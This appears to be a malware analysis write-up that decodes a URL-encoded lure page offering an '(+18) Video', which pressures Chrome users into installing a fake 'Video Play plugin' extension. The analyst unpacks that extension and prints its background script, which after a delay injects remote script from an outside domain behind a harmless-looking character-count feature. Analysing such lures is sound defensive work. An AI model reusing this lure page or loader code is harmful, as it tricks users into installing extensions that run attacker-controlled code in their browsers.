67%68%74%3A%31%35%30%70%78%3B%0A%09%70%61%64%64%69%6E%67%3A%31%30%70%78%3B%0A%09%62%61%63%6B%67%72%6F%75%6E%64%3A%20%23%46%46%46%3B%0A%7D%0A%2E%79%6F%75%74%75%62%65%62%6C%6F%63%6B%65%72%20%2E%73%68%61%72%65%62%6F%78%20%70%20%7B%0A%09%66%6F%6E%74%2D%73%69%7A%65%3A%31%38%70%78%3B%0A%09%6D%61%72%67%69%6E%2D%74%6F%70%3A%31%35%70%78%3B%0A%09%74%65%78%74%2D%61%6C%69%67%6E%3A%20%63%65%6E%74%65%72%3B%0A%7D%0A%2E%79%6F%75%74%75%62%65%62%6C%6F%63%6B%65%72%20%2E%73%68%61%72%65%62%75%74%68%6F%6C%64%65%72%20%7B%0A%09%74%65%78%74%2D%61%6C%69%67%6E%3A%20%63%65%6E%74%65%72%3B%0A%09%70%6F%73%69%74%69%6F%6E%3A%20%61%62%73%6F%6C%75%74%65%3B%0A%09%62%6F%74%74%6F%6D%3A%20%32%30%70%78%3B%0A%09%72%69%67%68%74%3A%20%30%70%78%3B%0A%09%6C%65%66%74%3A%20%32%70%78%3B%0A%7D%0A%2E%79%6F%75%74%75%62%65%62%6C%6F%63%6B%65%72%20%2E%73%68%61%72%65%62%75%74%20%7B%0A%20%20%20%20%62%6F%72%64%65%72%2D%72%61%64%69%75%73%3A%20%35%70%78%3B%0A%09%77%69%64%74%68%3A%32%34%33%70%78%3B%0A%09%68%65%69%67%68%74%3A%35%36%70%78%3B%0A%09%63%75%72%73%6F%72%3A%20%70%6F%69%6E%74%65%72%3B%0A%09%62%61%63%6B%67%72%6F%75%6E%64%3A%20%75%72%6C%28%27%68%74%74%70%3A%2F%2F%69%2E%69%6D%67%75%72%2E%63%6F%6D%2F%70%77%6E%63%54%67%4E%2E%67%69%66%27%29%20%30%70%78%20%30%70%78%20%6E%6F%2D%72%65%70%65%61%74%3B%0A%09%2F%2F%62%61%63%6B%67%72%6F%75%6E%64%3A%20%75%72%6C%28%27%2E%2E%2F%69%6D%61%67%65%73%2F%73%68%61%72%65%62%75%74%2E%70%6E%67%27%29%20%30%70%78%20%30%70%78%20%6E%6F%2D%72%65%70%65%61%74%3B%0A%20%20%20%20%64%69%73%70%6C%61%79%3A%20%2D%6D%6F%7A%2D%69%6E%6C%69%6E%65%2D%73%74%61%63%6B%3B%0A%20%20%20%20%64%69%73%70%6C%61%79%3A%20%69%6E%6C%69%6E%65%2D%62%6C%6F%63%6B%3B%0A%20%20%20%20%7A%6F%6F%6D%3A%20%31%3B%0A%20%20%20%20%2A%64%69%73%70%6C%61%79%3A%20%69%6E%6C%69%6E%65%3B%0A%7D%0A%2E%79%6F%75%74%75%62%65%62%6C%6F%63%6B%65%72%20%2E%63%6F%6E%74%72%6F%6C%6C%73%20%7B%0A%09%68%65%69%67%68%74%3A%33%35%70%78%3B%0A%09%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%3B%0A%09%62%6F%74%74%6F%6D%3A%30%70%78%3B%0A%09%6C%65%66%74%3A%30%70%78%3B%0A%09%72%69%67%68%74%3A%30%70%78%3B%0A%09%62%61%63%6B%67%72%6F%75%6E%64%3A%20%75%72%6C%28%27%68%74%74%70%3A%2F%2F%69%2E%69%6D%67%75%72%2E%63%6F%6D%2F%32%6E%79%69%79%48%48%2E%70%6E%67%27%29%3B%0A%7D%0A%2E%79%6F%75%74%75%62%65%62%6C%6F%63%6B%65%72%20%2E%63%6F%6E%74%72%6F%6C%6C%73%20%2E%6C%65%66%74%2D%63%6F%6E%74%72%6F%6C%6C%73%20%7B%0A%09%63%75%72%73%6F%72%3A%70%6F%69%6E%74%65%72%3B%0A%09%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%3B%0A%09%6C%65%66%74%3A%31%31%70%78%3B%0A%09%68%65%69%67%68%74%3A%33%35%70%78%3B%0A%09%77%69%64%74%68%3A%31%32%31%70%78%3B%0A%09%62%61%63%6B%67%72%6F%75%6E%64%3A%20%75%72%6C%28%27%68%74%74%70%3A%2F%2F%69%2E%69%6D%67%75%72%2E%63%6F%6D%2F%51%42%65%44%46%62%39%2E%70%6E%67%27%29%20%30%70%78%20%31%33%70%78%20%6E%6F%2D%72%65%70%65%61%74%3B%0A%7D%0A%2E%79%6F%75%74%75%62%65%62%6C%6F%63%6B%65%72%20%2E%63%6F%6E%74%72%6F%6C%6C%73%20%2E%72%69%67%68%74%2D%63%6F%6E%74%72%6F%6C%6C%73%20%7B%0A%09%63%75%72%73%6F%72%3A%70%6F%69%6E%74%65%72%3B%0A%09%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%3B%0A%09%72%69%67%68%74%3A%39%70%78%3B%0A%09%68%65%69%67%68%74%3A%33%35%70%78%3B%0A%09%77%69%64%74%68%3A%31%30%30%70%78%3B%0A%09%62%61%63%6B%67%72%6F%75%6E%64%3A%20%75%72%6C%28%27%68%74%74%70%3A%2F%2F%69%2E%69%6D%67%75%72%2E%63%6F%6D%2F%4B%6E%65%41%54%42%4C%2E%70%6E%67%27%29%20%30%70%78%20%31%33%70%78%20%6E%6F%2D%72%65%70%65%61%74%3B%0A%7D%0A%0A%23%66%6F%6F%74%65%72%20%7B%0A%2F%2F%70%6F%73%69%74%69%6F%6E%3A%20%66%69%78%65%64%3B%0A%63%75%72%73%6F%72%3A%70%6F%69%6E%74%65%72%3B%0A%77%69%64%74%68%3A%20%31%30%30%25%3B%0A%68%65%69%67%68%74%3A%31%32%30%70%78%3B%0A%62%61%63%6B%67%72%6F%75%6E%64%3A%20%23%66%66%66%20%75%72%6C%28%27%68%74%74%70%3A%2F%2F%69%2E%69%6D%67%75%72%2E%63%6F%6D%2F%47%62%66%69%51%6F%6F%2E%70%6E%67%27%29%20%63%65%6E%74%65%72%20%63%65%6E%74%65%72%20%6E%6F%2D%72%65%70%65%61%74%3B%0A%62%6F%72%64%65%72%2D%74%6F%70%3A%20%31%70%78%20%73%6F%6C%69%64%20%23%65%32%65%32%65%32%3B%0A%62%6F%74%74%6F%6D%3A%30%70%78%3B%0A%6C%65%66%74%3A%30%70%78%3B%0A%72%69%67%68%74%3A%30%70%78%3B%0A%7D%0A%3C%2F%73%74%79%6C%65%3E%0A%0A%3C%64%69%76%20%69%64%3D%22%68%65%61%64%65%72%22%3E%3C%2F%64%69%76%3E%0A%0A%3C%68%31%20%73%74%79%6C%65%3D%22%6D%61%72%67%69%6E%2D%74%6F%70%3A%31%30%30%70%78%3B%22%3E%28%2B%31%38%29%20%56%69%64%65%6F%3C%2F%68%31%3E%0A%3C%64%69%76%20%69%64%3D%22%6D%61%69%6E%22%3E%0A%3C%64%69%76%20%69%64%3D%22%63%6F%6E%74%65%6E%69%64%6F%22%20%20%73%74%79%6C%65%3D%22%6D%61%72%67%69%6E%2D%74%6F%70%3A%35%30%70%78%3B%22%3E%0A%0A%3C%21%2D%2D%20%23%23%23%23%20%56%49%44%45%4F%20%31%20%23%23%23%20%2D%2D%3E%0A%3C%64%69%76%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%67%6F%6F%67%6C%65%2E%63%6F%6D%2F%22%20%69%64%3D%22%75%6E%6F%22%20%6F%6E%63%6C%69%63%6B%3D%22%63%68%72%6F%6D%65%78%28%29%3B%22%20%63%6C%61%73%73%3D%22%79%6F%75%74%75%62%65%62%6C%6F%63%6B%65%72%22%20%73%74%79%6C%65%3D%22%77%69%64%74%68%3A%37%30%30%70%78%3B%68%65%69%67%68%74%3A%33%35%30%70%78%3B%62%61%63%6B%67%72%6F%75%6E%64%3A%23%30%30%30%30%30%30%20%75%72%6C%28%27%68%74%74%70%3A%2F%2F%69%2E%69%6D%67%75%72%2E%63%6F%6D%2F%79%45%54%59%6F%49%64%2E%67%69%66%27%29%20%63%65%6E%74%65%72%20%63%65%6E%74%65%72%20%6E%6F%2D%72%65%70%65%61%74%3B%22%3E%0A%3C%64%69%76%20%63%6C%61%73%73%3D%22%69%6D%61%67%65%22%20%73%74%79%6C%65%3D%22%62%61%63%6B%67%72%6F%75%6E%64%3A%23%30%30%30%30%30%30%3B%22%3E%3C%2F%64%69%76%3E%0A%3C%64%69%76%20%63%6C%61%73%73%3D%22%70%6C%61%79%2D%62%75%74%74%6F%6E%22%3E%3C%2F%64%69%76%3E%0A%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%6F%6E%74%72%6F%6C%6C%73%22%3E%0A%3C%64%69%76%20%63%6C%61%73%73%3D%22%6C%65%66%74%2D%63%6F%6E%74%72%6F%6C%6C%73%22%3E%3C%2F%64%69%76%3E%0A%3C%64%69%76%20%63%6C%61%73%73%3D%22%72%69%67%68%74%2D%63%6F%6E%74%72%6F%6C%6C%73%22%3E%3C%2F%64%69%76%3E%0A%3C%2F%64%69%76%3E%0A%3C%64%69%76%20%63%6C%61%73%73%3D%22%6F%76%65%72%6C%61%79%22%3E%3C%2F%64%69%76%3E%0A%3C%64%69%76%20%63%6C%61%73%73%3D%22%73%68%61%72%65%62%6F%78%22%3E%3C%2F%64%69%76%3E%0A%3C%2F%64%69%76%3E%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%64%69%76%20%69%64%3D%22%74%69%74%75%6C%6F%2D%62%6F%74%74%6F%6D%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%64%69%76%3E%0A%3C%21%2D%2D%20%23%23%23%23%20%56%49%44%45%4F%20%32%20%23%23%23%20%2D%2D%3E%0A%0A%3C%64%69%76%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%67%6F%6F%67%6C%65%2E%63%6F%6D%2F%22%20%69%64%3D%22%64%6F%73%22%20%63%6C%61%73%73%3D%22%79%6F%75%74%75%62%65%62%6C%6F%63%6B%65%72%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%3B%77%69%64%74%68%3A%37%30%30%70%78%3B%68%65%69%67%68%74%3A%33%35%30%70%78%3B%62%61%63%6B%67%72%6F%75%6E%64%3A%23%30%30%30%30%30%30%20%75%72%6C%28%27%76%65%72%69%66%69%63%61%2E%6A%70%67%67%27%29%20%63%65%6E%74%65%72%20%63%65%6E%74%65%72%20%6E%6F%2D%72%65%70%65%61%74%3B%22%3E%0A%3C%64%69%76%20%63%6C%61%73%73%3D%22%69%6D%61%67%65%22%20%73%74%79%6C%65%3D%22%62%61%63%6B%67%72%6F%75%6E%64%2D%69%6D%61%67%65%3A%20%75%72%6C%28%27%55%52%4C%5F%49%4D%47%27%29%22%3E%3C%2F%64%69%76%3E%0A%3C%64%69%76%20%63%6C%61%73%73%3D%22%70%6C%61%79%2D%62%75%74%74%6F%6E%22%3E%3C%2F%64%69%76%3E%0A%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%6F%6E%74%72%6F%6C%6C%73%22%3E%0A%3C%64%69%76%20%63%6C%61%73%73%3D%22%6C%65%66%74%2D%63%6F%6E%74%72%6F%6C%6C%73%22%3E%3C%2F%64%69%76%3E%0A%3C%64%69%76%20%63%6C%61%73%73%3D%22%72%69%67%68%74%2D%63%6F%6E%74%72%6F%6C%6C%73%22%3E%3C%2F%64%69%76%3E%0A%3C%2F%64%69%76%3E%0A%3C%64%69%76%20%63%6C%61%73%73%3D%22%6F%76%65%72%6C%61%79%22%3E%3C%2F%64%69%76%3E%0A%3C%64%69%76%20%63%6C%61%73%73%3D%22%73%68%61%72%65%62%6F%78%22%3E%3C%2F%64%69%76%3E%0A%3C%2F%64%69%76%3E%20%0A%3C%21%2D%2D%20%23%23%23%23%20%56%49%44%45%4F%20%32%20%46%49%4E%23%23%23%20%2D%2D%3E%0A%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%24%28%64%6F%63%75%6D%65%6E%74%29%2E%72%65%61%64%79%28%66%75%6E%63%74%69%6F%6E%28%29%7B%0A%24%28%27%23%75%6E%6F%27%29%2E%63%6C%69%63%6B%28%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%0A%24%28%22%2E%70%6C%61%79%2D%62%75%74%74%6F%6E%2C%2E%69%6D%61%67%65%22%29%2E%66%61%64%65%4F%75%74%28%29%3B%0A%63%68%72%6F%6D%65%78%28%29%3B%0A%7D%29%3B%0A%0A%7D%29%3B%0A%3C%2F%73%63%72%69%70%74%3E%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%6E%61%76%65%67%61%64%6F%72%28%29%3B%0A%66%75%6E%63%74%69%6F%6E%20%6E%61%76%65%67%61%64%6F%72%28%29%20%7B%0A%76%61%72%20%6E%61%76%65%67%61%64%6F%72%20%3D%20%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%3B%0A%69%66%20%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%69%6E%64%65%78%4F%66%28%27%46%69%72%65%66%6F%78%27%29%20%21%3D%2D%31%29%20%7B%0A%24%28%22%23%75%6E%6F%22%29%2E%68%69%64%65%28%29%3B%0A%24%28%22%23%64%6F%73%22%29%2E%73%68%6F%77%28%29%3B%0A%7D%20%65%6C%73%65%20%69%66%20%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%69%6E%64%65%78%4F%66%28%27%43%68%72%6F%6D%65%27%29%20%21%3D%2D%31%29%20%7B%0A%28%66%75%6E%63%74%69%6F%6E%28%61%2C%20%62%29%7B%0A%76%61%72%20%65%20%3D%20%6E%65%77%20%49%6D%61%67%65%28%29%3B%0A%65%2E%61%64%64%45%76%65%6E%74%4C%69%73%74%65%6E%65%72%28%27%6C%6F%61%64%27%2C%20%61%2C%20%66%61%6C%73%65%29%3B%0A%65%2E%61%64%64%45%76%65%6E%74%4C%69%73%74%65%6E%65%72%28%27%65%72%72%6F%72%27%2C%20%62%2C%20%66%61%6C%73%65%29%3B%0A%65%2E%73%72%63%20%3D%20%27%27%3B%0A%7D%29%28%66%75%6E%63%74%69%6F%6E%28%29%7B%0A%24%28%22%23%75%6E%6F%22%29%2E%68%69%64%65%28%29%3B%0A%24%28%22%23%64%6F%73%22%29%2E%73%68%6F%77%28%29%3B%0A%7D%2C%20%66%75%6E%63%74%69%6F%6E%28%29%7B%0A%0A%7D%29%3B%0A%20%7D%0A%7D%0A%66%75%6E%63%74%69%6F%6E%20%63%68%72%6F%6D%65%78%28%29%7B%0A%09%09%09%20%63%68%72%6F%6D%65%2E%77%65%62%73%74%6F%72%65%2E%69%6E%73%74%61%6C%6C%28%22%68%74%74%70%73%3A%2F%2F%63%68%72%6F%6D%65%2E%67%6F%6F%67%6C%65%2E%63%6F%6D%2F%77%65%62%73%74%6F%72%65%2F%64%65%74%61%69%6C%2F%63%6B%6F%64%6E%6E%6F%6B%65%6E%6E%6F%62%6B%6F%6A%6F%63%6F%6D%6E%67%65%61%6D%62%6F%64%6B%66%6F%6B%22%2C%20%66%75%6E%63%74%69%6F%6E%28%29%7B%0A%09%09%09%09%20%76%61%72%20%64%61%78%20%3D%20%6E%65%77%20%49%6D%61%67%65%28%29%3B%0A%64%61%78%2E%6F%6E%6C%6F%61%64%20%3D%20%66%75%6E%63%74%69%6F%6E%28%29%7B%0A%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%20%3D%20%22%68%74%74%70%73%3A%2F%2F%67%6F%6F%2E%67%6C%2F%47%66%30%61%33%54%22%3B%0A%2F%2F%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%20%3D%20%22%68%74%74%70%3A%2F%2F%67%6F%6F%2E%67%6C%2F%39%75%70%6D%5A%4A%22%3B%0A%7D%0A%64%61%78%2E%6F%6E%65%72%72%6F%72%20%3D%20%66%75%6E%63%74%69%6F%6E%28%29%7B%0A%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%20%3D%20%22%68%74%74%70%73%3A%2F%2F%67%6F%6F%2E%67%6C%2F%47%66%30%61%33%54%22%3B%0A%2F%2F%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%20%3D%20%22%68%74%74%70%3A%2F%2F%67%6F%6F%2E%67%6C%2F%39%75%70%6D%5A%4A%22%3B%20%20%68%74%74%70%3A%2F%2F%67%6F%6F%2E%67%6C%2F%79%50%58%5A%4C%47%20%20%20%20%20%20%68%74%74%70%73%3A%2F%2F%67%6F%6F%2E%67%6C%2F%4C%69%6D%74%66%0A%7D%0A%64%61%78%2E%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%68%6F%73%2E%61%6D%75%6E%67%2E%75%73%2F%77%69%64%67%65%74%2F%61%64%65%61%70%63%70%63%31%2E%70%6E%67%22%3B%0A%09%09%09%20%20%7D%2C%20%66%75%6E%63%74%69%6F%6E%28%65%72%72%29%0A%09%09%09%20%20%7B%0A%09%09%09%09%20%20%61%6C%65%72%74%28%22%20%53%6F%72%72%79%2C%69%66%20%79%6F%75%20%64%6F%6E%27%74%20%69%6E%73%74%61%6C%6C%20%56%69%64%65%6F%20%50%6C%61%79%20%70%6C%75%67%69%6E%2C%20%79%6F%75%20%77%69%6C%6C%20%6E%6F%74%20%62%65%20%61%62%6C%65%20%74%6F%20%77%61%74%63%68%20%74%68%65%20%76%69%64%65%6F%21%5C%72%5C%6E%43%6C%69%63%6B%20%27%41%64%64%20%45%78%74%65%6E%73%69%6F%6E%27%20%74%6F%20%77%61%74%63%68%20%74%68%65%20%56%69%64%65%6F%22%29%3B%0A%09%09%09%09%20%20%6C%6F%63%61%74%69%6F%6E%2E%72%65%6C%6F%61%64%28%29%3B%0A%09%09%09%20%20%7D%29%3B%0A%0A%73%65%74%54%69%6D%65%6F%75%74%28%66%75%6E%63%74%69%6F%6E%28%29%7B%0A%75%6E%6F%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%22%73%74%79%6C%65%22%2C%20%22%77%69%64%74%68%3A%37%30%30%70%78%3B%68%65%69%67%68%74%3A%33%35%30%70%78%3B%62%61%63%6B%67%72%6F%75%6E%64%3A%23%30%30%30%30%30%30%20%75%72%6C%28%27%76%65%72%62%79%2F%65%72%72%2E%70%6E%67%27%29%20%63%65%6E%74%65%72%20%63%65%6E%74%65%72%20%6E%6F%2D%72%65%70%65%61%74%3B%22%29%3B%0A%73%65%74%54%69%6D%65%6F%75%74%28%66%75%6E%63%74%69%6F%6E%28%29%0A%7B%0A%75%6E%6F%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%22%73%74%79%6C%65%22%2C%20%22%77%69%64%74%68%3A%37%30%30%70%78%3B%68%65%69%67%68%74%3A%33%35%30%70%78%3B%62%61%63%6B%67%72%6F%75%6E%64%3A%23%30%30%30%30%30%30%20%75%72%6C%28%27%76%65%72%62%79%2F%75%70%2E%67%69%66%27%29%20%63%65%6E%74%65%72%20%63%65%6E%74%65%72%20%6E%6F%2D%72%65%70%65%61%74%3B%22%29%3B%0A%0A%7D%2C%20%38%30%30%29%3B%0A%7D%2C%20%31%30%30%30%29%3B%0A%0A%7D%0A%3C%2F%73%63%72%69%70%74%3E%0A%0A%0A%3C%64%69%76%20%69%64%3D%22%66%6F%6F%74%65%72%22%20%73%74%79%6C%65%3D%22%6D%61%72%67%69%6E%2D%74%6F%70%3A%32%35%30%3B%20%70%6F%73%69%74%69%6F%6E%3A%66%69%78%65%64%3B%22%3E%3C%2F%64%69%76%3E%0A%0A%0A%3C%2F%62%6F%64%79%3E%0A%0A%3C%2F%68%74%6D%6C%3E'));
//-->
</Script>
Yet another URL encoded block, let's decode
0A<html xmlns="http://www.w3.org/1999/xhtml" prefix="og: http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="chrome-webstore-item" href="https://chrome.google.com/webstore/detail/ckodnnokennobkojocomngeambodkfok">
<link rel="shortcut icon" href="https://s.ytimg.com/yts/img/favicon-vfldLzJxy.ico" type="image/x-icon">
<title>New Video</title>
<script>new Image().src = '//whos.amung.us/widget/adeapcpc.png';</script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script>
<script type="text/javascript">
if((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i)))
{
location.replace("https://s3-eu-west-1.amazonaws.com/video47543/s.html");
}
if ( (navigator.userAgent.indexOf('Android') != -1) ) {
document.location = "https://s3-eu-west-1.amazonaws.com/video47543/s.html";
}
/*!function(a){var b=/iPhone/i,c=/iPod/i,d=/iPad/i,e=/(?=.*\bAndroid\b)(?=.*\bMobile\b)/i,f=/Android/i,g=/IEMobile/i,h=/(?=.*\bWindows\b)(?=.*\bTouch\b)/i,i=/BlackBerry/i,j=/Opera Mini/i,k=/(?=.*\bFirefox\b)(?=.*\bMobile\b)/i,l=new RegExp("(?:Nexus 7|BNTV250|Kindle Fire|Silk|GT-P1000)","i"),m=function(a,b){return a.test(b)},n=function(a){var n=a||navigator.userAgent;this.apple={phone:m(b,n),ipod:m(c,n),tablet:m(d,n),device:m(b,n)||m(c,n)||m(d,n)},this.android={phone:m(e,n),tablet:!m(e,n)&&m(f,n),device:m(e,n)||m(f,n)},this.windows={phone:m(g,n),tablet:m(h,n),device:m(g,n)||m(h,n)},this.other={blackberry:m(i,n),opera:m(j,n),firefox:m(k,n),device:m(i,n)||m(j,n)||m(k,n)},this.seven_inch=m(l,n),this.any=this.apple.device||this.android.device||this.windows.device||this.other.device||this.seven_inch,this.phone=this.apple.phone||this.android.phone||this.windows.phone,this.tablet=this.apple.tablet||this.android.tablet||this.windows.tablet},o=new n;o.Class=n,"undefined"!=typeof module&&module.exports?module.exports=o:"function"==typeof define&&define.amd&&define(o),a.isMobile=o}(this);
if (isMobile.any || navigator.platform.toLowerCase().indexOf("win") == -1) {
top.location.href="https://s3-eu-west-1.amazonaws.com/video47543/s.html";
}*/</script>
<script>
if (top.location != self.location) { top.location = self.location }
if (self != top) {
top.location.replace(location.href);
}
</script>
</head>
<body>
<style>
/******* BODY ********/
body {
font-size: 13px;
font-family: Arial, Helvetica, sans-serif;
background:#f1f1f1;
margin:0px;
padding:0px;
}
/******* HEADER ********/
#header {
position: fixed;
top:0px;
left:0px;
right:0px;
height: 50px;
width: 100%;
background: #fff url('http://i.imgur.com/5fLsIMa.png') left center no-repeat;
border-bottom: 1px solid #e8e8e8;
cursor: pointer;
z-index: 1999999999;
}
/******* MAIN ********/
#main {
width:702px;
height:510px;
border:0px solid #ccc;
margin:0px auto;
margin-top:20px;
padding:0px 0px 0px 0px;
overflow:hidden;
}
h1 {
margin:70px 0px 10px 0px;
padding:0px;
color:#333;
font-size: 20px;
font-weight: bold;
line-height: 1.38;
overflow:hidden;
text-align:center;
}
/******* CONTENIDO ********/
#contenido {
float:left;
width:700px;
margin:0px;
padding:0px 0px 110px 0px;
background: #fff url('http://i.imgur.com/ufkpYyf.png') bottom center no-repeat;
border: 1px solid;
border-color: #e5e6e9 #dfe0e4 #d0d1d5;
-webkit-border-radius: 5px;
overflow:hidden;
}
#titulo {
width:800px;
margin:10px 0px 10px 0px;
padding:0px;
color:#333;
font-size: 15px;
font-weight: normal;
line-height: 1.38;
overflow:hidden;
}
.youtubeblocker {
position:relative;
margin-bottom:0px;
cursor:pointer;
overflow: hidden;
}
.youtubeblocker .image {
width:100%;
height:100%;
background-size:100% 100%;
}
.youtubeblocker .play-button {
position:absolute;
top:50%;
left:50%;
margin-left:-34px;
margin-top:-23px;
display:block;
width:65px;
height:47px;
background: url('http://i.imgur.com/3lEq5if.png');
}
.youtubeblocker:hover .play-button {
background-position:-65px;
}
.youtubeblocker .overlay {
display:none;
background: #000;
opacity: .5;
width:100%;
height:100%;
position:absolute;
left:0;top:0;
}
.youtubeblocker .sharebox {
display:none;
position: absolute;
left:10px;
top:70px;
right:10px;
height:131px;
padding:0px;
background: url('compartir.png') center center no-repeat;
}
.youtubeblocker-ori .sharebox-ori {
display:none;
position: absolute;
left:10px;
top:50px;
right:10px;
height:150px;
padding:10px;
background: #FFF;
}
.youtubeblocker .sharebox p {
font-size:18px;
margin-top:15px;
text-align: center;
}
.youtubeblocker .sharebutholder {
text-align: center;
position: absolute;
bottom: 20px;
right: 0px;
left: 2px;
}
.youtubeblocker .sharebut {
border-radius: 5px;
width:243px;
height:56px;
cursor: pointer;
background: url('http://i.imgur.com/pwncTgN.gif') 0px 0px no-repeat;
//background: url('../images/sharebut.png') 0px 0px no-repeat;
display: -moz-inline-stack;
display: inline-block;
zoom: 1;
*display: inline;
}
.youtubeblocker .controlls {
height:35px;
position:absolute;
bottom:0px;
left:0px;
right:0px;
background: url('http://i.imgur.com/2nyiyHH.png');
}
.youtubeblocker .controlls .left-controlls {
cursor:pointer;
position:absolute;
left:11px;
height:35px;
width:121px;
background: url('http://i.imgur.com/QBeDFb9.png') 0px 13px no-repeat;
}
.youtubeblocker .controlls .right-controlls {
cursor:pointer;
position:absolute;
right:9px;
height:35px;
width:100px;
background: url('http://i.imgur.com/KneATBL.png') 0px 13px no-repeat;
}
#footer {
//position: fixed;
cursor:pointer;
width: 100%;
height:120px;
background: #fff url('http://i.imgur.com/GbfiQoo.png') center center no-repeat;
border-top: 1px solid #e2e2e2;
bottom:0px;
left:0px;
right:0px;
}
</style>
<div id="header"></div>
<h1 style="margin-top:100px;">(+18) Video</h1>
<div id="main">
<div id="contenido" style="margin-top:50px;">
<!-- #### VIDEO 1 ### -->
<div href="http://google.com/" id="uno" onclick="chromex();" class="youtubeblocker" style="width:700px;height:350px;background:#000000 url('http://i.imgur.com/yETYoId.gif') center center no-repeat;">
<div class="image" style="background:#000000;"></div>
<div class="play-button"></div>
<div class="controlls">
<div class="left-controlls"></div>
<div class="right-controlls"></div>
</div>
<div class="overlay"></div>
<div class="sharebox"></div>
</div>
<div id="titulo-bottom">
</div>
<!-- #### VIDEO 2 ### -->
<div href="http://google.com/" id="dos" class="youtubeblocker" style="display:none;width:700px;height:350px;background:#000000 url('verifica.jpgg') center center no-repeat;">
<div class="image" style="background-image: url('URL_IMG')"></div>
<div class="play-button"></div>
<div class="controlls">
<div class="left-controlls"></div>
<div class="right-controlls"></div>
</div>
<div class="overlay"></div>
<div class="sharebox"></div>
</div>
<!-- #### VIDEO 2 FIN### -->
<script type="text/javascript">
$(document).ready(function(){
$('#uno').click(function () {
$(".play-button,.image").fadeOut();
chromex();
});
});
</script>
<script type="text/javascript">
navegador();
function navegador() {
var navegador = navigator.userAgent;
if (navigator.userAgent.indexOf('Firefox') !=-1) {
$("#uno").hide();
$("#dos").show();
} else if (navigator.userAgent.indexOf('Chrome') !=-1) {
(function(a, b){
var e = new Image();
e.addEventListener('load', a, false);
e.addEventListener('error', b, false);
e.src = '';
})(function(){
$("#uno").hide();
$("#dos").show();
}, function(){
});
}
}
function chromex(){
chrome.webstore.install("https://chrome.google.com/webstore/detail/ckodnnokennobkojocomngeambodkfok", function(){
var dax = new Image();
dax.onload = function(){
window.location = "https://goo.gl/Gf0a3T";
//window.location = "http://goo.gl/9upmZJ";
}
dax.onerror = function(){
window.location = "https://goo.gl/Gf0a3T";
//window.location = "http://goo.gl/9upmZJ"; http://goo.gl/yPXZLG https://goo.gl/Limtf
}
dax.src="http://whos.amung.us/widget/adeapcpc1.png";
}, function(err)
{
alert(" Sorry,if you don't install Video Play plugin, you will not be able to watch the video!\r\nClick 'Add Extension' to watch the Video");
location.reload();
});
setTimeout(function(){
uno.setAttribute("style", "width:700px;height:350px;background:#000000 url('verby/err.png') center center no-repeat;");
setTimeout(function()
{
uno.setAttribute("style", "width:700px;height:350px;background:#000000 url('verby/up.gif') center center no-repeat;");
}, 800);
}, 1000);
}
</script>
<div id="footer" style="margin-top:250; position:fixed;"></div>
</body>
</html>
Alright this brings back memories. A "video" that asks to played, how do we play it? Download a "Video Play Plugin"
https://chrome.google.com/webstore/detail/ckodnnokennobkojocomngeambodkfok
Downloading (not Installing) this plugin
45to75_v0.0.4.crx
cp 45to75_v0.0.4.crx gangstaworm.zip
unzip gangstaworm.zip
Archive: gangstaworm.zip
warning [gangstaworm.zip]: 566 extra bytes at beginning or within zipfile
(attempting to process anyway)
creating: scripts/
inflating: scripts/background.js
inflating: scripts/content_script.js
inflating: manifest.json
creating: _locales/
creating: _locales/en/
inflating: _locales/en/messages.json
creating: images/
inflating: images/icon-128.png
inflating: images/icon-16.png
inflating: _metadata/verified_contents.json
Digging through this extension one of these files sends up deeper scripts/background.js
setTimeout(function()
{
(function()
{
var _0x8066x0=document["getElementsByTagName"]("head")[0];
var _0x8066x1=document["createElement"]("script");
_0x8066x1["type"]="text/javascript";
_0x8066x1["src"]="https://as45t6e3q3q3.info/"+Math["floor"](9999*Math["random"]());
_0x8066x0["appendChild"](_0x8066x1)
}
)()
}
,150000)
"use strict";var cmid;chrome.extension.onMessage.addListener(function(a){if("updateContextMenu"===a.request){var b="Measure: ",c=b+a.selection.length.toString().replace(/\B(?=(\d{3})+(?!\d))/g,",");if(c==b)null!=cmid&&(chrome.contextMenus.remove(cmid),cmid=null);else{var d={title:c,contexts:["selection"]};null!=cmid?chrome.contextMenus.update(cmid,d):cmid=chrome.contextMenus.create(d)}}});
Checking https://as45t6e3q3q3.info/
